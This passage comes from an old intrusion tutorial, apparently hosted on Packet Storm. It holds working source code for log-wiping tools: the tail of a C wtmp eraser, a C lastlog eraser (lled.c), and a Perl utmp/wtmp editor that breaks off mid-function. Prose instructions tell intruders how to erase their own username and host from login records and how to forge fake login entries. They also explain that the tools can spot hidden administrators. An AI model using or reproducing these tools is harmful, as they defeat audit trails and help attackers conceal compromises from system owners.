while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
if (host)
if (strstr(utmp.ut_host,host)) tot++;
else {cnt++;write(fd,&utmp,sizeof(struct utmp));}
if (name) {
if (strcmp(utmp.ut_name,name)) {cnt++;
write(fd,&utmp,sizeof(struct utmp));}
else {
if (n>0) {
n--;cnt++;
write(fd,&utmp,sizeof(struct utmp));}
else
{
printinfo(&utmp);
printf("Erase entry (y/n/f(astforward))? ");
c='a';
while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
if (c=='f') {
cnt++;
write(fd,&utmp,sizeof(struct utmp));
printf("Fast forward how many entries? ");
scanf("%d",&n);}
if (c=='n') {
cnt++;
write(fd,&utmp,sizeof(struct utmp));
}
if (c=='y') tot++;
}
} }
}
close(fp);
close(fd);
}
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
}
remnull(name)
char *name;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct utmp utmp;
if (fp=open(file,O_RDONLY)) {
fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
if (utmp.ut_time) {
cnt++;
write(fd,&utmp,sizeof(struct utmp));
}
else
tot++;
}
close(fp);
close(fd);
}
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
}
usage()
{
printf("Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
printf("\t-h\tThis help\n");
printf("\t-f\tUse FILE instead of default\n");
printf("\t-a\tShow all entries found\n");
printf("\t-u\tShow all entries for USER\n");
printf("\t-b\tShow NULL entries\n");
printf("\t-e\tErase USER completely\n");
printf("\t-c\tErase all connections containing HOST\n");
printf("\t-z\tShow ZAP'd entries\n");
printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
}
---------------------- cut here
You might also have to clean stuff out of the file /vat/adm/lastlog
For this use the lled.c. Compile the program and name it lled.
Here is a menu from the program when you type ./lled
[4:04am][/home/paris/compile]lled
Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
-h This help
-f Use FILE instead of default
-a Show all entries found
-u Show all entries for USER
-b Show NULL entries
-e Erase USER completely
-c Erase all connections containing HOST
-z Show ZAP'd entries
-x Attempt to remove ZAP'd entries completely
It would be good to try to view first using -u, but many times it will not
show your username in the lastlog, but it will still have your host, so I
have found that if you know what to look for you can just type something like:
If my host name that I was coming from was machine.edit.com, I could type
lled -e username -c machine.edit
If you need to view the lastlog your host entry should be at the end of the
file, just type: lled -a
chmod the file lastlog.tmp 644 and copy the file over the top of the lastlog
file in the log directory just like you did above for the wted.
BE SURE TO SET THE PATH FOR YOUR lastlog below!
Ok here is your lled.c
-------------------------- cut here
#include <stdio.h>
#include <time.h>
#include <lastlog.h>
#include <fcntl.h>
char *file="/var/adm/lastlog";
main(argc,argv)
int argc;
char *argv[];
{
int i;
if (argc==1) usage();
for(i=1;i<argc;i++)
{
if(argv[i][0] == '-')
{
switch(argv[i][1])
{
case 'b': printents(""); break;
case 'z': printents("Z4p"); break;
case 'e': erase(argv[i+1]); break;
case 'c': erase(0,argv[i+1]); break;
case 'f': file=argv[i+1]; break;
case 'u': printents(argv[i+1]); break;
case 'a': printents("*"); break;
case 'x': remnull(argv[i+1]); break;
default:usage();
}
}
}
}
printents(name)
char *name;
{
struct lastlog utmp,*ptr;
int fp=-1;
ptr=&utmp;
if (fp=open(file,O_RDONLY))
{
while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog))
{
if ( !(strcmp(name,ptr->ll_line)) || (name=="*") ||
(!(strcmp("Z4p",name)) && (ptr->ll_time==0)))
printinfo(ptr);
}
close(fp);
}
}
printinfo(ptr)
struct lastlog *ptr;
{
char tmpstr[256];
printf("%s\t",ptr->ll_line);
strcpy(tmpstr,ctime(&(ptr->ll_time)));
tmpstr[strlen(tmpstr)-1]='\0';
printf("%s\t",tmpstr);
printf("%s\n",ptr->ll_host);
}
erase(name,host)
char *name,*host;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct lastlog utmp;
unsigned char c;
if (fp=open(file,O_RDONLY)) {
fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
if (host)
if (strstr(utmp.ll_host,host)) tot++;
else {cnt++;write(fd,&utmp,sizeof(struct lastlog));}
if (name) {
if (strcmp(utmp.ll_line,name)) {cnt++;
write(fd,&utmp,sizeof(struct lastlog));}
else {
if (n>0) {
n--;cnt++;
write(fd,&utmp,sizeof(struct lastlog));}
else
{
printinfo(&utmp);
printf("Erase entry (y/n/f(astforward))? ");
c='a';
while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
if (c=='f') {
cnt++;
write(fd,&utmp,sizeof(struct lastlog));
printf("Fast forward how many entries? ");
scanf("%d",&n);}
if (c=='n') {
cnt++;
write(fd,&utmp,sizeof(struct lastlog));
}
if (c=='y') tot++;
}
} }
}
close(fp);
close(fd);
}
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
}
remnull(name)
char *name;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct lastlog utmp;
if (fp=open(file,O_RDONLY)) {
fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
if (utmp.ll_time) {
cnt++;
write(fd,&utmp,sizeof(struct lastlog));
}
else
tot++;
}
close(fp);
close(fd);
}
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
}
usage()
{
printf("Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
printf("\t-h\tThis help\n");
printf("\t-f\tUse FILE instead of default\n");
printf("\t-a\tShow all entries found\n");
printf("\t-u\tShow all entries for USER\n");
printf("\t-b\tShow NULL entries\n");
printf("\t-e\tErase USER completely\n");
printf("\t-c\tErase all connections containing HOST\n");
printf("\t-z\tShow ZAP'd entries\n");
printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
}
---------------------------------------------------------------- cut here
A good perl script for editing utmp, wtmp, and checking processes.
It will also let you insert lines in wtmp. So if you need to play you
can add clinton.whitehouse.gov logging into port ttyp3 and show he stayed
on the system for a few hours!
Running 'check' will let you know if someone is on the system and not showing
up in the utmp log. Admins like to hide the fact that they are online
sometimes. This will allow you to see their connection. You must be root to
run the script, and they need perl 5.003+ on thier system. After starting
the script just type help.
Here are some of the basic commands:
starts by loading wtmp
delete user username
delete host hostanme
write
read wtmp
delete user username
delete host hostname
write
do help for the rest ... the best wtmp,wtmp editor around!
Say thankyou i-e ;)
-----------------------start of utmpman.pl
#!/usr/bin/perl -w
#
# Variable defines.
my($utmp_location) = "/var/run/utmp";
my($wtmp_location) = "/var/log/wtmp";
my($shells_location) = "/etc/shells";
my($ttybase) = "tty";
my($ttyrange) = "pqrs"; # TTYrange standard on most linux systems.
my($ttyports) = "012345657689abcfef"; # TTYports standard on most linux systems.
# Global initializations.
my($active_file) = "";
my(%entries) = {};
my(@cmdline) = ();
my(@shells) = ();
# Display banner.
print "\nutmp Manager v0.8\n\n";
# Access check.
die("utmpman :: You must be root to run this application!\n") unless ($> == 0);
# Read in valid shells.
if (defined($shells_location)) {
open(SHELLFILE, "<$shells_location");
@shells = <SHELLFILE>;
close(SHELLFILE);
}
# Process "basename" of each shell.
@shells = map( { /([^\/\n]+)\n*$/; $1; } @shells);
print push(@shells) . " valid shells in $shells_location: @shells\n" if (defined(@shells));
readfile("$utmp_location");
print("\nutmpman: $active_file> ");
while (<STDIN>) {
process_cmd(split);
print("\nutmpman: $active_file> ");
}
sub process_cmd {
return if (!defined(@_));
my(@line) = map { lc($_) } @_;
$_ = shift(@line);
SWITCH: {
/^check$/ && do {
check_func(@line);
last SWITCH;
};
/^delete$/ && do {
del_func(@line);
last SWITCH;
};
/^help$/ && do {
help_func();
last SWITCH;
};
/^insert$/ && do {
ins_func(@line);
last SWITCH;
};
/^list$/ && do {
list_func(@line);
last SWITCH;
};
/^read$/ && do {
read_func(@line);
last SWITCH;
};
/^write$/ && do {
write_func(@line);
last SWITCH;
};
/^quit|exit$/ && exit(0);
# DEFAULT.
print ("Invalid command.\n");
}
}
# HELP
sub help_func {
print << "EOM";
utmpManager Help
----------------
Note: - <n> is an argument.
- [id=] is a token which expects a value as part of command
(ie, insert id=p5 user=root 11/23/96). See the insert command.
- A line is the full name to the tty port, ie ttyp0.
- An id is the *unique* representation of the port
(without the tty, etc), ie "p0" (for ttyp0).
check
- Perform user consistancy check. Use this to make sure that the data in
utmp agrees with who is actually on the machine. This is useful in
determining if a user is online with hidden ports, running nohup'd
processes, or running iScreen.
delete <x>-<y>
- Delete entries #x to #y.
delete host <host>
- Delete *all* entries which match the substring <host>.
delete line|id <line|id>
- Delete entry containing <line> or <id>.
insert {id=|line=} [type=] [user=] [host=] [ConnTime] {LogoffTime}
- Insert an entry into utmp/wtmp files specifying any combination
of id/line, type, username, host, connection time, and logoff time.
(LogoffTime only valid for WTMP files.)
list host <host>
- List all entries matching the substring <host>.
list line|id <line|id>
- List all entries matching <line> or <id>.
read utmp|wtmp|<filename>
- Read entries from either default wtmp, default utmp, or an arbitrary
filename. Note: arbitrary filenames MUST start with either "utmp" or
"wtmp" to be used with this editor. Rename files *outside* of this
editor if necessary. If read is executed without any arguments, it
rereads the last given filename, which is displayed on the prompt.
write {filename}
- Write entries to file {filename}. If write is executed without any
arguments, then entries will be written to the last given filename,
which is displayed on the prompt.
EOM
}
# DELETE
sub del_func {
my(@params) = @_;
if (!push(@_)) {
print("delete :: Not enough parameters. See \"help\" for syntax.\n");
return undef;
} elsif ($params[0] =~ /host|user|id|line/) {
del_by_data(@_);
} elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/) {
del_by_range($params[0]);
} elsif ($params[0] =~ m/^(\d+)$/) {
del_by_range("$1-$1");
}
# Renumber list after delete operation.
resync();
}
sub del_by_range {
my($range)=shift;
$range =~ m/(\d+)*-(\d+)*/;
my($lo, $hi, $count)=($1, $2, 0);
$lo = 0 if (!defined($lo));
$hi = scalar(keys(%entries)) if (!defined($hi));
foreach (sort( { $a <=> $b } keys(%entries))) {
if (($_ >= $lo) && ($_ <= $hi)) {
delete($entries{$_});
$count++;
}
}
print "$count entries deleted.\n";
}
sub del_by_data {
my($op, $data) = @_;
my($count) = 0;
if ((length($data) < 5) && ($op eq "host")) {
print "Must specify at least 5 characters for delete hostmask.\n";
return undef;
} elsif (((length($data) > 4) && ($op eq "id"))||
((length($data) > 11) && ($op eq "line"))) {
print "Invalid $op specified.\n";
return undef;
}
# Note: If we are deleting by user, then user must match, *exactly*!
$data = "^" . pack("a8", $data) . "\$" if ($op eq "user");
foreach (sort( { $a <=> $b } keys(%entries))) {
if (%{$entries{$_}}->{$op} =~ m/$data/i) {
delete($entries{$_});
++$count;
}
}
if (!$count) {
print "No $op entries matching $data.\n";
} else {
print "$count entries deleted.\n";
}
}
# INSERT
# Date1 Time1 = DateTime1 => mm/dd/[cc]yy[:hh:mm[:ss]]
# Date2 Time2 = DateTime2 => (see above)
# user=<username>
# host=<hostname>
# id=<id> | line=<line>
#
# utmp:
# insert {id=|line=} [type=] [user=] [host=] [DateTime]
# wtmp:
# insert {id=|line=} [user=] [host=] [DateTime1] {DateTime2}
sub ins_func {
my(%cmdopt)={};
my($datetime1, $datetime2, $gmdate, $gmdate2);
# Get random pid out of the way.
$cmdopt{"pid"} = int(rand(32656)+100);
$cmdopt{"addr"} = pack("a4", "");
# Get command options.
foreach (@_) {
if (/=/) {
local($key, $value)=split(/=/);
$cmdopt{$key} = $value;
} else {
if (!defined($datetime1)) {
$datetime1 = $_;
next;
}
if (!defined($datetime2)) {
$datetime2 = $_ ;
next;
}
print "insert :: Invalid options specified. Please see \"help\" for syntax.\n";
return undef;
}
}
# Check for an illegal pair or illegal option.
foreach (keys(%cmdopt)) {
if (!(/^host|id|line|type|user|addr$/)) {
print "insert :: Invalid options specified. Please see \"help\" for syntax.\n";
return undef;
}
if (($_ eq "last") && ($active_file !~ m!/*utmp[^/]*$!i)) {
print "insert :: LAST option only valid for utmp files.\n";
return undef;
}
}
# Get date in seconds since 1970.
$gmdate = SecsSince1970($datetime1);
# Get ending date in seconds since 1970.
$gmdate2 = SecsSince1970($datetime2) if (defined($datetime2));
if (!defined($gmdate) || (!defined($gmdate2) && defined($datetime2))) {
print "insert :: Invalid date specified.\n";
return undef;
}
if (defined($gmdate2)) {
if ($gmdate2 < $gmdate) {
print "insert :: First date/time must be *later* than second date/time.\n";
return undef;
}
}
if (defined($cmdopt{"id"}) && defined($cmdopt{"line"})) {
print "insert :: Insert by LINE or ID only. Please do not specify both.\n";
return undef;
}
my($op);
if (!defined($cmdopt{"id"})) {
$cmdopt{"id"} = $cmdopt{"line"};
$op = "line";
if (!($cmdopt{"id"} =~ s/^$ttybase//)) {
print "insert :: Invalid line specified.\n";
return undef;
}
} else {
$cmdopt{"line"} = $ttybase . $cmdopt{"id"};
$op = "id";
}
if (!(defined($cmdopt{"line"}) || defined($cmdopt{"id"}))) {
print "insert :: Neither LINE nor ID value found. See \"help\" for syntax.\n";
return undef;
}
my($searchdata) = ($active_file =~ m!/*utmp[^/]*$!i) ?
(pack(($op eq "line") ? "a12" : "a4", $cmdopt{$op})):$cmdopt{$op};
my($epos1, $npos1, $epos2, $npos2) = ();
my($oldpos, $count)=("", 0);
foreach (sort( { $a <=> $b } keys(%entries))) {
if ($active_file =~ m!/*utmp[^/]*$!i) {
# Handle utmp insertion by line insertion.
if (%{$entries{$_}}->{$op} eq $searchdata) {
printf ("insert :: $op $searchdata already exists at position $_\n");
# This needs to check every option in %cmdopt for defined or null.
$count = 0;
foreach (qw(user host time)) {
if (defined($cmdopt{$_})) {
$count++ if ($cmdopt{$_} ne "");
}
}
if (!$count) {
printf ("insert :: No other data specified. Entry unchanged.\n");
return undef;
}
last;
}
} else {
# Handle wtmp insertion by time position. (Messy)
$epos1 = $oldpos if (defined($npos1) && !defined($epos1));
$npos1 = $_ if (%{$entries{$_}}->{"time"} > $gmdate);
last if (!defined($gmdate2) && defined($epos1));
$epos2 = $oldpos if (defined($npos2));
$npos2 = $_ if (%{$entries{$_}}->{"time"} > $gmtime2);
last if (defined($epos2));
}
$oldpos = $_;
}
# Set any unspecified defaults.
$cmdopt{"user"} = pack("a8", "") if !defined($cmdopt{"user"});
$cmdopt{"host"} = pack("a16", "") if !defined($cmdopt{"host"});
$cmdopt{"type"} = 7 if !defined($cmdopt{"type"});
# Determine end of list insertion positions. (IE, dates entered are after
# dates in wtmp file or line/id not found in utmp file.
$epos1 = (scalar(keys(%entries)) + 1) if (!defined($npos1));
if (defined($datetime2)) {
$epos2 = (scalar(keys(%entries)) + 1) if (!defined($npos2));
++$epos2 if (defined($gmtime2) && !defined($npos1));
}
# Parse insert data and insert entry.
$epos1 = sprintf("%7.3f", ($npos1 - $epos1)/2) if (defined($npos1));
$epos2 = sprintf("%7.3f", ($npos2 - $epos2)/2)
if (defined($npos2) && defined($gmdate2));
# Insert first entry.
$cmdopt{"time"} = $gmdate;
@{$entries{$epos1}}{qw(type pid line id time user host addr)} =
@{%cmdopt}{qw(type pid line id time user host addr)};
if (defined($epos2)) {
$cmdopt{"user"} = pack("a8", "");
$cmdopt{"host"} = pack("a16","");
$cmdopt{"id"} = pack("a4", "");
$cmdopt{"time"} = $gmdate2;
@{$entries{$epos2}}{qw(type pid line id time user host addr)} =
@{%cmdopt}{qw(type pid line id time user host addr)};
}
resync();
}
# LIST
sub list_func {
my(@params) = @_;
if (!push(@_) || ($params[0] eq "all")) {
list_by_range("-");
return 0;
} elsif ($params[0] =~ /^host|user|id|line$/) {
list_by_data(@_);
return 0;
} elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/) {
list_by_range($params[0]);
return 0;
} elsif ($params[0] =~ m/^(\d+)$/) {
list_by_range("$1-$1");
return 0;
}
print ("list :: Error in parameters. See \"help\" for syntax.\n");
return undef;
}
sub list_by_data {
my($op, $data) = @_;
my($count) = 0;
foreach (sort( {$a <=> $b} keys(%entries))) {
if (%{$entries{$_}}->{$op} =~ m/$data/i) {
list_entry($_);
++$count;
}
}
print "No $op entries matching $data.\n" if (!$count);
}
sub list_by_range {
my($range)=shift;
$range =~ m/(\d+)*-(\d+)*/;
my($lo, $hi)=($1, $2);
$lo = 0 if (!defined($lo));
$hi = scalar(keys(%entries)) if (!defined($hi));
foreach (sort( { $a <=> $b } keys(%entries))) {
if (($_ >= $lo) && ($_ <= $hi)) {
list_entry($_);
}
}
}
sub list_entry {
printf("#%3d - " . gmtime(%{$entries{$_}}->{"time"}), $_);
printf(" %s/%s", @{$entries{$_}}{qw(id line)});
printf(": %s ", %{$entries{$_}}->{"user"})
if (%{$entries{$_}}->{"user"} ne pack("a8", ""));
printf("from %s", %{$entries{$_}}->{"host"})
if (%{$entries{$_}}->{"host"} ne pack("a16", ""));
if (%{$entries{$_}}->{"addr"} ne "\0\0\0\0") {
printf(" (%s)", longtodot4(%{$entries{$_}}->{"addr"}));
}
print ("\n");
printf("%7sPID = %u\n", "", %{$entries{$_}}->{"pid"})
if (%{$entries{$_}}->{"pid"} && (%{$entries{$_}}->{"user"} ne pack("a8","")));
}
# <Silmaril> printf "#$_ - %s %s/%s: %s from %s\n", @{$v}->{qw(time id line user host)};
# <Silmaril> now *that's* cool :-)
# <Silmaril> should be like this: @{$v}{qw(time id line user host)}
# <Silmaril> I had an extra -> in my first version.
#
# Or course, it's changed since then, but - "Thanks, Sil!" :)
#
# READ
sub read_func {
my($arg)=shift;
$arg = $utmp_location if ($arg eq "utmp");
$arg = $wtmp_location if ($arg eq "wtmp");
$arg = $active_file if (!defined($arg));
if ($arg !~ m!/*[uw]tmp[^/]*$!) {
print("read :: Filenames *must* start with either 'wtmp' or 'utmp' to be edited.\n");
return undef;
}
readfile($arg);
}
# WRITE
sub write_func {
my($file)=shift;
my($count)=0;
$file = $active_file if (!defined($file));
if ($file !~ m!/*[uw]tmp[^/]*$!) {
print ("write :: File must start with 'utmp' or 'wtmp'.\nRename file outside this program.\n");
return undef;
}
if (!open(OUTFILE, ">$file")) {
print ("write :: Can't open $file for output.\n");
return undef;
}
binmode(OUTFILE);
foreach (sort( { $a <=> $b } keys(%entries))) {
printf OUTFILE ("%s", pack("i L a12 a4 L a8 a16 a4",
@{$entries{$_}}{qw(type pid line id time user host addr)}));
$count++;
}
print ("$active_file: " . scalar(keys(%entries)) . " entries written.\n");
close(OUTFILE);
}
# CHECK
sub check_func {
if (push(@_)) {
print "check :: Invalid options specified. Please see \"help\"\n";
return undef;
}
if ($active_file !~ m!/*utmp[^/]*$!) {
print "check :: Command can only be run on utmp files.\n";
return undef;
}
# Build struct of ports containing port name, device num and owner.
# Note: Test run in grepstr may *not* be portable for all Unix
# types. Be forewarned! This was designed for Linux.
# Hint: For all intents and purposes, s/^$ttybase([$ttyrange][$ttyports])$/
# should return the same as what you expect in "struct utmp->ut_id".
my($grepstr) = "^($ttybase\[$ttyrange\]\[$ttyports\])\$";
my(%ports) = {};
my($user, $rdev) = ();
opendir(DEVDIR, "/dev");
my(@devfiles) = readdir(DEVDIR);
@devfiles = grep(/$grepstr/, @devfiles);
close(DEVDIR);
foreach (@devfiles) {
/^$ttybase([$ttyrange][$ttyports])$/;
if (!defined($1)) {
print "check :: Warning! Could not extract port ID from $_.\n";
} else {
($user, $rdev) = (stat("/dev/$_"))[4, 6];
$user = getpwuid($user);
$ports{$1} = newport($_, $rdev, $user);
}
}
# Check ownership of /dev ports.
my(@logdev)=();
foreach (sort(keys(%ports))) {
push(@logdev, $_) if (%{$ports{$_}}->{"owner"} ne "root");
}
@logdev = sort(@logdev);
# Check utmp (against ports detected as logged in);
my(@logutmp)=();
foreach (sort( { $a <=> $b } keys(%entries))) {
if (defined(%{$entries{$_}}->{"user"}) && defined(%{$entries{$_}}->{"host"}) &&
defined(%{$entries{$_}}->{"id"}) && defined(%{$entries{$_}}->{"pid"})) {
push(@logutmp, %{$entries{$_}}->{"id"})
if ((%{$entries{$_}}->{"id"} =~ /[$ttyrange][$ttyports]/) &&
((%{$entries{$_}}->{"user"} ne pack("a8", "")) ||
((%{$entries{$_}}->{"host"} ne pack("a16", "")) &&
(%{$entries{$_}}->{"id"} ne pack("a4", "")) &&
(%{$entries{$_}}->{"line"} ne pack("a12", "")) &&
(%{$entries{$_}}->{"pid"} > 0))));
}
}
@logutmp = sort(@logutmp);
# Check PIDs (find processes with active port ids)
opendir(PIDDIR, "/proc");
my(%processes) = {};
my(@portprocesses) = ();
foreach (grep(/\d+/, readdir(PIDDIR))) {
local($procdata, $cmdline);
open(PROCFILE, "</proc/$_/stat");
$procdata = <PROCFILE>;
close(PROCFILE);
if (-e "/proc/$_/stat") {
local($cmdline, $devnum, $portid);
($cmd, $devnum) = (split(/ /, $procdata))[1, 6];
# Remove surrouding () from command name.
$cmd =~ s/[\(\)]//g;
$portid = dev2id(\%ports, $devnum);
if (defined($portid)) {
push(@portprocesses, $portid)
if (!defined(listpos(\@portprocesses, $portid))&&($$ != $_));
$processes{$_} = newproc($cmd, $portid) if (defined($portid) && ($$ != $_));
}
}
}
close(PIDDIR);
# A port is *not* logged in if there is no dev entry for port, no utmp entry
# and no active processes.
my(@validshellports) = ();
foreach (sort( { $a <=> $b} keys(%processes))) {
push(@validshellports, %{$processes{$_}}->{"port"})
if (defined(listpos(\@shells, %{$processes{$_}}->{"cmd"}))&&
!defined(listpos(\@validshellports, %{$processes{$_}}->{"port"})));
}
# Remove ports with valid shells from list of ports with active processes.
my(@noshellports) =
sort(grep(!defined(listpos(\@validshellports, $_)), @portprocesses));
@validshellports = sort(@validshellports);
print "Ports with active /dev files: @logdev\n"
if (defined(@logdev));
print "Ports with utmp entries: @logutmp\n"
if (defined(@logutmp));
print "Ports with valid shells: @validshellports\n"
if (defined(@validshellports));
print "Ports with active processes and *no* shells: @noshellports\n"
if (defined(@noshellports));
}
# GENERAL
sub readfile {
local($file);
$file = shift;
my($index)=1;
my($buffer)="";
# Insure we have a clean hash table before we start reading in the file.
foreach (keys(%entries)) {
undef(%{$entries{$_}});
delete(${entries{$_}});
}
open(UTMPFILE, "<$file") || die("utmp-parse: Can't open $file - $!\n");
binmode(UTMPFILE);
# 1/17/96, struct utmp is 56 bytes (54 according to addition! :P).
while (read(UTMPFILE, $buffer, 56)) {
$entries{$index++} = newutmp($buffer);
}
$active_file = $file;
print ("$active_file: " . scalar(keys(%entries)) . " entries loaded.\n");
close(UTMPFILE);
}
sub newutmp {
my($newbuff) = shift;
my($longaddr) = 0;
$newnode = bless {
"type" => undef, "pid" => undef, "line" => undef, "id" => undef,
"time" => undef, "user" => undef, "host" => undef, "addr" => undef
}, 'UTMPNODE';
@{$newnode}{qw(type pid line id time user host addr)}=
unpack("i L a12 a4 L a8 a16 a4", $newbuff);
return $newnode;
}
sub newport {
$newnode = bless {
"port" => undef, "rdev" => undef, "owner" => undef, "cmd" => undef,
}, 'PORTNODE';
@{$newnode}{qw(port rdev owner)} = @_;
return $newnode;
}
sub newproc {
$newnode = bless {
"cmd" => undef, "port" => undef,
}, 'PROCNODE';
@{$newnode}{qw(cmd port)} = @_;
return $newnode;
}
# Renumber hashes to default order.
sub resync {
my(%newhash) = ();
my($count)=0;
# Write ordered list in to temporary hash, deleting as we go.
foreach (sort( {$a <=> $b} keys(%entries))) {
$newhash{++$count} = $entries{$_};
delete($entries{$_});
}
# Copy elements back in to original hash table.
foreach (sort( {$a <=> $b} keys(%newhash))) {
$entries{$_} = $newhash{$_};
}
}
sub longtodot4 {
my($addr)=shift;
return join(".", map( ord($_), split(//, $addr)));
}
sub dev2id {
my($portlist, $rdev) = @_;
foreach (sort(keys(%{$portlist}))) {
return $_ if (%{$portlist}->{$_}->{"rdev"}==$rdev);
}
return undef;
}
sub listpos {
my($arrayref, $search) = @_;
my($count) = 0;
$^W = 0;
foreach (@{$arrayref}) {
return $count if ($search eq ${$arrayref}[$count]);
$count++;
}
$^W = 1;
return undef;
}
### DATE ROUTINES
# The following code taken & modified from the Date::Manip package.
# Here is his copyright:
#
## Copyright (c) 1995,1996 Sullivan Beck. All rights reserved.
## This program is free software; you can redistribute it and/or modify it
## under the same terms as Perl itself.
sub SecsSince1970 {
# Parse as mm/dd/[cc]yy[:hh:mm[:ss]]
my($datetime) = shift;
my($m,$d,$y,$h,$mn,$s) = ();
# If date is not defined, then return local current date and time.
return time() if (!defined($datetime));
$datetime =~
s!^(\d{1,2})/(\d{1,2})/(\d{4}|\d{2})(?:\:(\d{2}):(\d{2})(?:\:(\d{2}))?)?!!;
($m, $d, $y, $h, $mn, $s) = ($1, $2, $3, $4, $5, $6);
$m--;
# Finalize time components and check them.
$y = (($y < 70) ? "20":"19" . $y) if (length($y)==2);
# This checks for any *non-matched* portion of $datetime. If there is such
# an animal, then there is illegal data specified. Also screens for undefined
# components which HAVE to be in ANY valid date/time (ie, month, day, year).
return undef if (!defined($m) || !defined($d) || !defined($y) || length($datetime));
# Set time components with unspecified values.
$s = 0 if (!defined($s));
$mn = 0 if (!defined($mn));
$h = 0 if (!defined($h));
# Check for ranges.
return undef if (($m > 11) || ($h > 23) || ($mn > 59) || ($s > 59));
# Begin conversion to seconds since 1/1/70.
my($sec_now,$sec_70)=();
$sec_now=DaysSince999($m,$d,$y);
return undef if (!defined($sec_now));
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed